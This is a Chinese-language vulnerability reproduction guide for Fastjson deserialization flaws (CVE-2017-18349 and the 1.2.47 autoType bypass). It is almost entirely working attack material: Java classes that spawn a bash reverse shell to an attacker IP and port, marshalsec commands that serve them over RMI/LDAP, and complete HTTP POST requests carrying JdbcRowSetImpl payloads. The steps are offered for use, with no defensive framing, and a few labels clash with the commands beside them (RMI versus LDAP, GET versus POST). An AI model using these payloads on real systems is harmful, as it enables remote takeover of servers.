Fastjson
1.漏洞复现
CVE-2017-18349
影响范围:Fastjson <= 1.2.24
创建TouchFile.java
import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {"/bin/bash","-c","bash -i >& /dev/tcp/IP/端口 0>&1"}; Process pc = rt.exec(commands); pc.waitFor(); } catch (Exception e) { } } }
生成TouchFile.class,然后放入自己网站根目录
javac TouchFile.java
marshalsec工具,https://github.com/mbechler/marshalsec
开启RMI服务,监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://自己网站IP:80/#TouchFile" 9999
先用NC监听,GET请求反弹shell
POST / HTTP/1.1 Host: 192.168.135.131:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 164 { "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://192.168.165.79:9999/TouchFile", "autoCommit":true } }
1.2.47-rce
影响范围:Fastjson <= 1.2.47
创建Exploit.java
import java.io.BufferedReader; import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; public class Exploit{ public Exploit() throws Exception { Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/IP/端口;cat <&5 | while read line; do $line 2>&5 >&5; done"}); InputStream is = p.getInputStream(); BufferedReader reader = new BufferedReader(new InputStreamReader(is)); String line; while((line = reader.readLine()) != null) { System.out.println(line); } p.waitFor(); is.close(); reader.close(); p.destroy(); } public static void main(String[] args) throws Exception { } }
生成Exploit.class,然后放入自己网站根目录
javac Exploit.java
marshalsec工具,https://github.com/mbechler/marshalsec
开启RMI服务,监听9999端口
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://自己网站IP:80/#Exploit" 9999
先用NC监听,GET请求反弹shell
POST / HTTP/1.1 Host: 192.168.135.131:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/json Content-Length: 267 { "a":{ "@type":"java.lang.Class", "val":"com.sun.rowset.JdbcRowSetImpl" }, "b":{ "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"ldap://192.168.165.79:9999/Exploit", "autoCommit":true } }